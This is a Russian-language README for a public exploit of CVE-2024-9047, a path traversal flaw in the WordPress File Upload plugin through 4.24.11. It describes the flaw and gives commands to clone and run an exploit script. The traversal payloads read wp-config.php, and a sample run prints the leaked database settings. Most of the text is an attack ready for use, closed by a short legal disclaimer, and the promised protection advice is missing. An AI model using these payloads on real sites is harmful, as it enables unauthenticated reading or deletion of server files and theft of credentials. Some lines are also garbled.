
Эксплойт для плагина загрузки файлов WordPress - все версии до 4.24.11 уязвимы.
Плагин WordPress File Upload для WordPress уязвим к Path Traversal во всех версиях до 4.24.11 включительно через файл wfu_file_downloader.php. Эта уязвимость позволяет неаутентифицированным злоумышленникам читать или удалять файлы за пределами целевого каталога. Успешная эксплуатация требует, чтобы целевая установка WordPress работала на PHP 7.4 или более ранней версии.
Злоумышленник может воспользоваться этой уязвимостью, отправив специально сформированный запрос к уязвимой конечной точке wfu_file_downloader.php, и манипулируя параметром пути к файлу для получения несанкционированного доступа к конфиденциальным файлам на сервере.
4.24.11 или более ранней версии).7.4 или более ранней.Клонируйте этот репозиторий:
git clone https://github.com/Nxploited/CVE-2024-9047-Exploit.git
cd CVE-2024-9047-Exploit
Установите зависимости Python (при необходимости):
pip install requests
Запустите скрипт для проверки версии плагина и эксплуатации уязвимости:
python3 CVE-2024-9047.py --url http://target-site.com --command /../../../../../path/to/target/file
Для эксплуатации уязвимой конфигурации по умолчанию и чтения конфигурационного файла WordPress:
python3 CVE-2024-9047.py --url http://192.168.1.100 --command /../../../../../opt/lampp/htdocs/wordpress/wp-config.php
C:\Users\Nxploit\Desktop\-C>python CVE-2024-9047.py -u http://192.168.100.74:888/wordpress/
Detected version: "trunk"
The site is vulnerable!
Exploit successful! Response:
<?php
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress7' );
/** Database username */
define( 'DB_USER', 'root' );
/** Database password */
define( 'DB_PASSWORD', '' );
/** Database hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
Чтобы защитить ваш сайт WordPress:
Этот код предназначен только для образовательных и исследовательских целей. Несанкционированное использование этого скрипта на системах, которыми вы не владеете или не имеете явного разрешения на тестирование, является незаконным и неэтичным. Авторы не несут ответственности за любое неправомерное использование этого кода.